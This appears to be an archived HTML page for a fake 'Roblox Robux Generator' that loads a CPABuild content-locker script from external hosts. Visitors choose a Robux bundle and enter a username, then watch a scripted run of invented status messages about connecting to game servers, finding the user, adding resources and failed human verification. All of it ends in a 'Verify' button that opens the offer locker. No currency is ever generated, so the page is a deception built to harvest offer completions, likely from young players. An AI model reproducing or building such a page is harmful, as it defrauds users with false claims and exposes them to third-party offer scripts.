<!DOCTYPE html>
-->
<html>
<!-- Added by Bilal Rht --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by Bilal Rht -->
<head>


<script type="text/javascript">
    var CPABUILDSETTINGS={"it":2485527,"key":"2d5d4"};
</script>
<script src="https://d12u7tum9sda5e.cloudfront.net/5849dc5.js"></script>


	
    <title>Roblox - Robux Generator</title>
<meta name="description" content="Roblox Robux Generator"/>
<meta property="og:title" content="Roblox - Robux Generator"/>
<meta property="og:description" content="Roblox Robux Generator"/>
<meta name="referrer" content="no-referrer">
<meta name="robots" content="noindex,nofollow">


</script>


    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(http://fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        :root {
    --var-border-radius: 10px;
    --v1ar-color-red: #e03e53;
	--var-color-red: #f51b00;
    --var-color-blue: #00b6fe;
    --var-color-green: #97cc3c;
    --var-color-yellow: #e4e726;
    --var-text-shadow: 1px 1px 1px rgba(26, 26, 26, 0.5);
}

* {
	font-family: 'Bangers', cursive;
    color: white;
}

html {
    scroll-behavior: smooth;
}

body {
    width: 100vw;
    min-height: 100vh;
    margin: 0;
    padding: 0;
    background:url("https://d13pxqgp3ixdbh.cloudfront.net/uploads/16212327424f0a4d8ed15720b0bacf4ca692567633.jpg");
	background-attachment: fixed;
    overflow-x: hidden;
	background-color:#000;
	background-size:cover;
	background-position: center;
	background-repeat: no-repeat;
	background-size: cover;
}

.container {
    display: flex;
    align-items: center;
    justify-content: center;
    flex-direction: column;
}

#logo {
    margin-top: 54px;
    width: 50%;
	min-width: 280px;
	max-width: 350px;
	height: auto;
    margin-bottom: 84px;
}

.input-container {
    font-family: inherit;
    display: none;
    padding: 16px;
}

#username-form {
    d1isplay: flex;
    justify-content: center;
    flex-flow: wrap;
}

.username-input {
    max-width: 80%;
	height: 30px;
    font-size: 1.6rem;
    padding: 16px;
    border: gray solid 3px;
    border-radius: var(--var-border-radius);
    text-align: center;
    background-color: rgba(0, 0, 0, 0.6);
    color: white;
    margin: 16px;
	text-decoration:none;
}

.next-button {
    font-size: 1.6rem;
    width: 250px;
	min-width: 200px;
    border: white solid 0px;
    color: #000;        
    transition: all 0.2s ease-in-out;		
	margin:20px auto;
	background-color: yellow;
	text-align:center;
	padding:20px 0;
	border-radius: 10px;
}

.next-button:hover
{
	transform: scale(1.1) !important;
    cursor: pointer;
	transition: all 0.3s ease-in-out !important;
	animation: borderPulse 1000ms infinite ease-out, colorShift 10000ms infinite ease-in;
}
.username-form-feedback {
    display: none;
    color: var(--var-color-red);
    font-size: 1.3rem;
    text-align: center;
    background-color: rgba(0, 0, 0, 0.5);
    padding: 16px;
    border-radius: var(--var-border-radius);
}

#loading-container {
    display: none;
    min-width: 30%;
    padding: 16px;
}

.loading-status {
	font-family: 'Barlow', sans-serif;
    color: #fff;
    font-size: 1.6rem;
    text-align: center;
    background-color: rgba(0, 0, 0, 0.7);
    padding: 16px;
    border-radius: var(--var-border-radius);
    border: solid 4px #fff;
}

.kudos-container {
    display: none;
    justify-content: center;
    flex-flow: wrap;
    justify-items: center;
	filter: drop-shadow(2px 3px 1.5px rgba(1, 1, 0, 0.7));
}

.kudos-box {
    text-align: center;
    border: 0px black solid;
	margin: 17px;
    font-size: 1.5rem;
    transition: all 0.1s ease-in-out;
	width:150px;
	height:170px;
	background-color: #fff;
	transform: translateX(0em) perspective(200px) rotateY(10deg);
	border-radius: 10px;
}

.kudos-box:hover, .kudos-box:active .kudos-box:focus{
    transform: scale(1.2);
    cursor: pointer;
	background-color: yellow;
}



.bundle-title {
    background-color: var(--var-color-blue);
    padding: 8px 16px;
    text-shadow: var(--var-text-shadow);
    border-top-left-radius: 5px;
    border-top-right-radius: 5px;
}
.kudos-image-container {
    position: relative;
}

.kudos-image {
    margin-bottom: -4px;
}

.over {
    position: relative;
}

.ovimg {
    margin-bottom: -4px ;
}

.bundle-amount {
    padding: 16px;
    border-bottom-left-radius: 5px;
    border-bottom-right-radius: 5px;
    background-color: var(--var-color-blue);
    text-shadow: var(--var-text-shadow);
}

.select-kudos {
    display: none;
    font-size: 1.6rem;
    transition: all 0.2s ease-in-out;
	width: 250px;
	min-width: 200px;
	margin:64px auto;
	background-color: yellow;
	text-align:center;
	padding: 20px 0;
	border-radius: 10px;
	color: #000;
	
}

.shadow{
	box-shadow(2px 3px 1.5px rgba(247, 216, 0, 0.5));
	filter: drop-shadow(2px 3px 1px rgba(1, 1, 0, 0.7));
}

.shadow1{
	box-shadow(2px 3px 1.5px rgba(247, 216, 0, 0.5));
	filter: drop-shadow(2px 3px 1px rgba(1, 1, 0, 0.7));
	text-align:center;
}

.select-kudos h3{
    padding: 27px;
	color: #000;
	font-size: 30px;
	letter-spacing: 1px;
}
.select-kudos:hover {
    transform: scale(1.1) !important;
    cursor: pointer;
	transition: all 0.3s ease-in-out !important;
	animation: borderPulse 1000ms infinite ease-out, colorShift 10000ms infinite ease-in;
}


/* Continue animation and add shine on hover */
button:hover,
button:focus {
	animation: borderPulse 1000ms infinite ease-out, colorShift 10000ms infinite ease-in, hoverShine 200ms;
}


/* Declare border pulse animation */
@keyframes borderPulse {
  0% {
    box-shadow: inset 0px 0px 0px 5px rgba(255, 255, 255,.4), 0px 0px 0px 0px rgba(255,255,255,1);
  }
  100% {
    box-shadow: inset 0px 0px 0px 3px rgba(117, 117, 255,.2), 0px 0px 0px 10px rgba(255,255,255,0);
  }
}


.manual-verify-button h3{
	padding: 27px;
}

.manual-verify-button {
	display:none;
    transition: all 0.2s ease-in-out;
	font-size: 1.6rem;
    transition: all 0.2s ease-in-out;
	width: 250px;
	min-width: 200px;
	margin:64px auto;
	background-color: yellow;
	text-align:center;
	color: #000;
	padding: 20px 0;
	border-radius:10px;
}

.manual-verify-button:hover {
    transform: scale(1.1) !important;
    cursor: pointer;
	transition: all 0.3s ease-in-out !important;
	animation: borderPulse 1000ms infinite ease-out, colorShift 10000ms infinite ease-in;
}


:root {
    --animate-duration: 1s;
    --animate-delay: 1s;
    --animate-repeat: 1;
}
.animate__animated {
    -webkit-animation-duration: 1s;
    animation-duration: 1s;
    -webkit-animation-duration: var(--animate-duration);
    animation-duration: var(--animate-duration);
    -webkit-animation-fill-mode: both;
    animation-fill-mode: both;
}
@-webkit-keyframes bounceIn {
    0%,
    20%,
    40%,
    60%,
    80%,
    to {
        -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
        animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    }
    0% {
        opacity: 0;
        -webkit-transform: scale3d(0.3, 0.3, 0.3);
        transform: scale3d(0.3, 0.3, 0.3);
    }
    20% {
        -webkit-transform: scale3d(1.1, 1.1, 1.1);
        transform: scale3d(1.1, 1.1, 1.1);
    }
    40% {
        -webkit-transform: scale3d(0.9, 0.9, 0.9);
        transform: scale3d(0.9, 0.9, 0.9);
    }
    60% {
        opacity: 1;
        -webkit-transform: scale3d(1.03, 1.03, 1.03);
        transform: scale3d(1.03, 1.03, 1.03);
    }
    80% {
        -webkit-transform: scale3d(0.97, 0.97, 0.97);
        transform: scale3d(0.97, 0.97, 0.97);
    }
    to {
        opacity: 1;
        -webkit-transform: scaleX(1);
        transform: scaleX(1);
    }
}
@keyframes bounceIn {
    0%,
    20%,
    40%,
    60%,
    80%,
    to {
        -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
        animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    }
    0% {
        opacity: 0;
        -webkit-transform: scale3d(0.3, 0.3, 0.3);
        transform: scale3d(0.3, 0.3, 0.3);
    }
    20% {
        -webkit-transform: scale3d(1.1, 1.1, 1.1);
        transform: scale3d(1.1, 1.1, 1.1);
    }
    40% {
        -webkit-transform: scale3d(0.9, 0.9, 0.9);
        transform: scale3d(0.9, 0.9, 0.9);
    }
    60% {
        opacity: 1;
        -webkit-transform: scale3d(1.03, 1.03, 1.03);
        transform: scale3d(1.03, 1.03, 1.03);
    }
    80% {
        -webkit-transform: scale3d(0.97, 0.97, 0.97);
        transform: scale3d(0.97, 0.97, 0.97);
    }
    to {
        opacity: 1;
        -webkit-transform: scaleX(1);
        transform: scaleX(1);
    }
}
.animate__bounceIn {
    -webkit-animation-duration: 0.75s;
    animation-duration: 0.75s;
    -webkit-animation-duration: calc(var(--animate-duration) * 0.75);
    animation-duration: calc(var(--animate-duration) * 0.75);
    -webkit-animation-name: bounceIn;
    animation-name: bounceIn;
}
@-webkit-keyframes bounceInDown {
    0%,
    60%,
    75%,
    90%,
    to {
        -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
        animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    }
    0% {
        opacity: 0;
        -webkit-transform: translate3d(0, -3000px, 0) scaleY(3);
        transform: translate3d(0, -3000px, 0) scaleY(3);
    }
    60% {
        opacity: 1;
        -webkit-transform: translate3d(0, 25px, 0) scaleY(0.9);
        transform: translate3d(0, 25px, 0) scaleY(0.9);
    }
    75% {
        -webkit-transform: translate3d(0, -10px, 0) scaleY(0.95);
        transform: translate3d(0, -10px, 0) scaleY(0.95);
    }
    90% {
        -webkit-transform: translate3d(0, 5px, 0) scaleY(0.985);
        transform: translate3d(0, 5px, 0) scaleY(0.985);
    }
    to {
        -webkit-transform: translateZ(0);
        transform: translateZ(0);
    }
}
@keyframes bounceInDown {
    0%,
    60%,
    75%,
    90%,
    to {
        -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
        animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    }
    0% {
        opacity: 0;
        -webkit-transform: translate3d(0, -3000px, 0) scaleY(3);
        transform: translate3d(0, -3000px, 0) scaleY(3);
    }
    60% {
        opacity: 1;
        -webkit-transform: translate3d(0, 25px, 0) scaleY(0.9);
        transform: translate3d(0, 25px, 0) scaleY(0.9);
    }
    75% {
        -webkit-transform: translate3d(0, -10px, 0) scaleY(0.95);
        transform: translate3d(0, -10px, 0) scaleY(0.95);
    }
    90% {
        -webkit-transform: translate3d(0, 5px, 0) scaleY(0.985);
        transform: translate3d(0, 5px, 0) scaleY(0.985);
    }
    to {
        -webkit-transform: translateZ(0);
        transform: translateZ(0);
    }
}
.animate__bounceInDown {
    -webkit-animation-name: bounceInDown;
    animation-name: bounceInDown;
}

.bg1 {
    background: url(https://roblox-robux.cf/bg.png) no-repeat;
    height: 32px;
    top: -32px;
    position: absolute;
    width: 100%;
    left: 0;
}

h2, h3, h4, h5, h6{
	color: #000;
	margin:0;
	font-weight: 500;
}

.inner-image{
	padding: 30px 20px;
}

.buck{
	width: 58%;
	margin:0;
}


.loader2 {
  color: #E4E726;
  font-size: 50px;
  text-indent: -9999em;
  overflow: hidden;
  width: 1em;
  height: 1em;
  border-radius: 50%;
  margin: 40px auto;
  position: relative;
  -webkit-transform: translateZ(0);
  -ms-transform: translateZ(0);
  transform: translateZ(0);
  -webkit-animation: load6 1.7s infinite ease, round 1.7s infinite ease;
  animation: load6 1.7s infinite ease, round 1.7s infinite ease;
}
@-webkit-keyframes load6 {
  0% {
    box-shadow: 0 -0.83em 0 -0.4em, 0 -0.83em 0 -0.42em, 0 -0.83em 0 -0.44em, 0 -0.83em 0 -0.46em, 0 -0.83em 0 -0.477em;
  }
  5%,
  95% {
    box-shadow: 0 -0.83em 0 -0.4em, 0 -0.83em 0 -0.42em, 0 -0.83em 0 -0.44em, 0 -0.83em 0 -0.46em, 0 -0.83em 0 -0.477em;
  }
  10%,
  59% {
    box-shadow: 0 -0.83em 0 -0.4em, -0.087em -0.825em 0 -0.42em, -0.173em -0.812em 0 -0.44em, -0.256em -0.789em 0 -0.46em, -0.297em -0.775em 0 -0.477em;
  }
  20% {
    box-shadow: 0 -0.83em 0 -0.4em, -0.338em -0.758em 0 -0.42em, -0.555em -0.617em 0 -0.44em, -0.671em -0.488em 0 -0.46em, -0.749em -0.34em 0 -0.477em;
  }
  38% {
    box-shadow: 0 -0.83em 0 -0.4em, -0.377em -0.74em 0 -0.42em, -0.645em -0.522em 0 -0.44em, -0.775em -0.297em 0 -0.46em, -0.82em -0.09em 0 -0.477em;
  }
  100% {
    box-shadow: 0 -0.83em 0 -0.4em, 0 -0.83em 0 -0.42em, 0 -0.83em 0 -0.44em, 0 -0.83em 0 -0.46em, 0 -0.83em 0 -0.477em;
  }
}
@keyframes load6 {
  0% {
    box-shadow: 0 -0.83em 0 -0.4em, 0 -0.83em 0 -0.42em, 0 -0.83em 0 -0.44em, 0 -0.83em 0 -0.46em, 0 -0.83em 0 -0.477em;
  }
  5%,
  95% {
    box-shadow: 0 -0.83em 0 -0.4em, 0 -0.83em 0 -0.42em, 0 -0.83em 0 -0.44em, 0 -0.83em 0 -0.46em, 0 -0.83em 0 -0.477em;
  }
  10%,
  59% {
    box-shadow: 0 -0.83em 0 -0.4em, -0.087em -0.825em 0 -0.42em, -0.173em -0.812em 0 -0.44em, -0.256em -0.789em 0 -0.46em, -0.297em -0.775em 0 -0.477em;
  }
  20% {
    box-shadow: 0 -0.83em 0 -0.4em, -0.338em -0.758em 0 -0.42em, -0.555em -0.617em 0 -0.44em, -0.671em -0.488em 0 -0.46em, -0.749em -0.34em 0 -0.477em;
  }
  38% {
    box-shadow: 0 -0.83em 0 -0.4em, -0.377em -0.74em 0 -0.42em, -0.645em -0.522em 0 -0.44em, -0.775em -0.297em 0 -0.46em, -0.82em -0.09em 0 -0.477em;
  }
  100% {
    box-shadow: 0 -0.83em 0 -0.4em, 0 -0.83em 0 -0.42em, 0 -0.83em 0 -0.44em, 0 -0.83em 0 -0.46em, 0 -0.83em 0 -0.477em;
  }
}
@-webkit-keyframes round {
  0% {
    -webkit-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
@keyframes round {
  0% {
    -webkit-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

.loading-container .loader2{
	margin: 20px auto;
	font-size: 30px;
}


</style>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<!--Favicon-->
<link rel="shortcut icon" type="image/x-icon" href="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16162172173fc8b0cfffb073cd1f1647724ff75f9f.png">

<!--Fonts-->
<link href="https://fonts.googleapis.com/css2?family=Barlow:wght@200;300;400&amp;display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Bangers&amp;display=swap" rel="stylesheet">

    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<div class="container" id="main">
            <img
                src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/15350241425257ab2ba1d496c887a99d67bc48ce1a.png" alt="Fall Guys" class="animate__animated animate__bounceInDown" id="logo"/>
            <div
                id="usernameFromContainer"
                class="input-container animate__animated animate__bounceIn"
            >
                <p
                    id="username-form-feedback"
                    class="username-form-feedback animate__animated animate__bounceIn"
                >
                    <span style="color: white;">Error:</span>
                    Username can't be empty!
                </p>
                <form id="username-form">
                    <input
                        id="username-input"
                        class="username-input"
                        type="text"
                        placeholder="Username"
                    />
					<div class="shadow1">
                    <button class="next-button animate__animated animate__bounceIn" type="submit">Next</button>
					</div>
                </form>
            </div>

            <div id="loading-container" class="animate__animated animate__bounceIn">
			<div class="loader2"></div>
                <p class="loading-status" id="loading-status">
				
                    Loading...
                </p>
				<div class="shadow">
                <div class="manual-verify-button animate__animated animate__bounceIn" id="manual-verify-button1" onclick="CPABuildLock()">
                    Verify
                    
<script src="https://d13nu0oomnx5ti.cloudfront.net/249fcfc.js"></script>
                </div>
				</div>
            </div>
<script>
$(".kudos-box").click(function() {
          $(".kudos-box").css("background-color","");
          $(this).css("background-color","#000");

    });
</script>
            <div id="kudos-container" class="kudos-container animate__animated animate__bounceIn">
                <div class="kudos-box ">
				<div class="inner-image">
					<img class="buck" src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1620885920ccf5fc3c612abfdfee7ba34abe53c4c2.png">
					<h3>800</h3>
					<h6>Robux</h6>
				</div>
				
                    
                </div>
                <div class="kudos-box">
				<div class="inner-image">
					<img class="buck" src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1620885920ccf5fc3c612abfdfee7ba34abe53c4c2.png">
					<h3>1,700</h3>
					<h6>Robux</h6>
				</div>
                    
                </div>
                <div class="kudos-box">
				<div class="inner-image">
					<img class="buck" src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1620885920ccf5fc3c612abfdfee7ba34abe53c4c2.png">
					<h3>4,500</h3>
					<h6>Robux</h6>
				</div>
                    
                </div>
                <div class="kudos-box">
				<div class="inner-image">
					<img class="buck" src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1620885920ccf5fc3c612abfdfee7ba34abe53c4c2.png">
					<h3>10,000</h3>
					<h6>Robux</h6>
				</div>
                    
                </div>
            </div>
			<div class="shadow">
            <div class="select-kudos animate__animated animate__bounceIn" id="select-kudos-button">
                Proceed
            </div>
			</div>
        </div>
		
								
							</div>
            <div class="grid-column-decor-generator-b"></div>
        </div>
		</div>
		
<script>
document.getElementById('timer').innerHTML =
  005 + ":" + 20;
startTimer();

function startTimer() {
  var presentTime = document.getElementById('timer').innerHTML;
  var timeArray = presentTime.split(/[:]+/);
  var m = timeArray[0];
  var s = checkSecond((timeArray[1] - 1));
  if(s==59){m=m-1}
  //if(m<0){alert('timer completed')}
  if(m<0){
  document.getElementById("timer").classList.add("display-none");
  document.getElementById("timer1").classList.remove("display-none");
  //document.getElementById("timer").classList.remove("display-none");
  //document.getElementById("timer").innerHTML = "Paragraph changed!";
  }
  
  document.getElementById('timer').innerHTML =
    m + ":" + s;
  console.log(m)
  setTimeout(startTimer, 1500);
}

function checkSecond(sec) {
  if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
  if (sec < 0) {sec = "59"};
  return sec;
}
</script>
<script type="text/javascript">
    function renderUsernameForm() {
    return new Promise((resolve) => {
        const usernameFromContainer = document.getElementById("usernameFromContainer");
        const usernameForm = document.getElementById("username-form");
        const usernameFormFeedback = document.getElementById("username-form-feedback");
        const usernameInput = document.getElementById("username-input");

        usernameFromContainer.style.display = "block";

        usernameForm.addEventListener("submit", (e) => {
            e.preventDefault();
            const username = usernameInput.value;

            if (!username) {
                usernameFormFeedback.style.display = "block";
            } else {
                usernameForm.style.display = "none";
                usernameFormFeedback.style.display = "none";
				usernameFromContainer.style.display = "none";
                resolve();
            }
        });
    });
}

function renderKudosBundles() {
    return new Promise((resolve) => {
        const kudosContainer = document.getElementById("kudos-container");
        kudosContainer.style.display = "flex";

        const kudosBoxes = document.querySelectorAll(".kudos-box");
        const selectKudosButton = document.getElementById("select-kudos-button");
        kudosBoxes.forEach((box) => {
            box.addEventListener("click", (e) => {
                kudosBoxes.forEach((_) => (_.style.transform = ""));
				kudosBoxes.forEach((_) => (_.style.backgroundColor = ""));
                box.style.transform = "scale(1.1)";
				box.style.backgroundColor = "yellow";
                selectKudosButton.style.display = "block";
                window.scrollTo(0, document.body.scrollHeight);
            });
        });

        selectKudosButton.addEventListener("click", () => {
            kudosContainer.style.display = "none";
            selectKudosButton.style.display = "none";
            resolve();
        });
    });
}

function renderLoadingScreen() {
    return new Promise((resolve) => {
        const loadingContainer = document.getElementById("loading-container");
        const loadingStatus = document.getElementById("loading-status");
        const manualVerifyButton1 = document.getElementById("manual-verify-button1");

        loadingContainer.style.display = "block";

        const statusTexts = [
            { _: "Loading.", color: "#fff" },
			{ _: "Loading..", color: "#fff" },
			{ _: "Loading...", color: "#fff" },
			{ _: "Loading.", color: "#fff" },
			{ _: "Loading..", color: "#fff" },
			{ _: "Connecting to Game Server.", color: "#fff" },
			{ _: "Connecting to Game Server..", color: "#fff" },
			{ _: "Connecting to Game Server...", color: "#fff" },
			{ _: "Connected Successfully...", color: "var(--var-color-green)" },
			{ _: "Connected Successfully...", color: "var(--var-color-green)" },
			{ _: "Searching User.", color: "#fff" },
			{ _: "Searching User..", color: "#fff" },
			{ _: "Searching User...", color: "#fff" },
			{ _: "Searching User.", color: "#fff" },
			{ _: "User Found!", color: "var(--var-color-green)" },
			{ _: "User Found!", color: "var(--var-color-green)" },
			{ _: "Connecting to User Database.", color: "#fff" },
			{ _: "Connecting to User Database..", color: "#fff" },
			{ _: "Connecting to User Database...", color: "#fff" },
			{ _: "Connecting to User Database.", color: "#fff" },
			{ _: "Connected Successfully...", color: "var(--var-color-green)" },
			{ _: "Connected Successfully...", color: "var(--var-color-green)" },
			{ _: "Adding Resources.", color: "#fff" },
			{ _: "Adding Resources..", color: "#fff" },
			{ _: "Adding Resources...", color: "#fff" },
			{ _: "Adding Resources.", color: "#fff" },
			{ _: "Adding Resources...", color: "#fff" },
            { _: "Security Firewall Detected!", color: "var(--var-color-green)"},
			{ _: "Security Firewall Detected!", color: "var(--var-color-green)"},
            { _: "Verifying human.", color: "#fff" },
			{ _: "Verifying human..", color: "#fff" },
            { _: "Launching Automatic Human Verification (1/3).", color: "var(--var-color-yellow)" },
			{ _: "Launching Automatic Human Verification (1/3)..", color: "var(--var-color-yellow)" },
			{ _: "Launching Automatic Human Verification (1/3)...", color: "var(--var-color-yellow)" },
			{ _: "Launching Automatic Human Verification (1/3).", color: "var(--var-color-yellow)" },
            { _: "Human Verification Failed (2 Attempt Remaining)", color: "var(--var-color-red)" },
			{ _: "Human Verification Failed (2 Attempt Remaining)", color: "var(--var-color-red)" },
			{ _: "Human Verification Failed (Skipping)", color: "var(--var-color-red)" },
			{ _: "Launching Automatic Human Verification (2/3).", color: "var(--var-color-yellow)" },
			{ _: "Launching Automatic Human Verification (2/3)..", color: "var(--var-color-yellow)" },
			{ _: "Launching Automatic Human Verification (2/3)...", color: "var(--var-color-yellow)" },
			{ _: "Launching Automatic Human Verification (2/3).", color: "var(--var-color-yellow)" },
			{ _: "Human Verification Failed (1 Attempt Remaining)", color: "var(--var-color-red)" },
			{ _: "Human Verification Failed (1 Attempt Remaining)", color: "var(--var-color-red)" },
			{ _: "Human Verification Failed (Skipping)", color: "var(--var-color-red)" },
			{ _: "Manual Verification Required", color: "var(--var-color-red)" },
			{ _: "Manual Verification Required", color: "var(--var-color-red)" },
			{ _: "Launching Manual Human Verification.", color: "var(--var-color-yellow)" },
			{ _: "Launching Manual Human Verification..", color: "var(--var-color-yellow)" },
			{ _: "Launching Manual Human Verification...", color: "var(--var-color-yellow)" },
            { _: "Waiting For Completion", color: "var(--var-color-red)" },
        ];

        statusTexts.forEach((text, i) => {
            setTimeout(() => {
                loadingStatus.innerHTML = text._;
                loadingStatus.style.color = text.color;
                loadingStatus.style.borderColor = text.color;
                if (i === statusTexts.length - 1) {
                    manualVerifyButton1.style.display = "block";
                }
            }, 1000 * i + Math.random() * 400);
        });
    });
}

async function init() {
    await renderKudosBundles();
    await renderUsernameForm();
    await renderLoadingScreen();
}

init();


</script>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
  
   
</script>
<script src="https://d13nu0oomnx5ti.cloudfront.net/c3628b0.js"></script>
<script type="text/javascript">

   

</script>
</body>

<!-- Mirrored from roblox-robux.cf/garena~Get2021 by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 01 Aug 2021 18:56:43 GMT -->
</html>
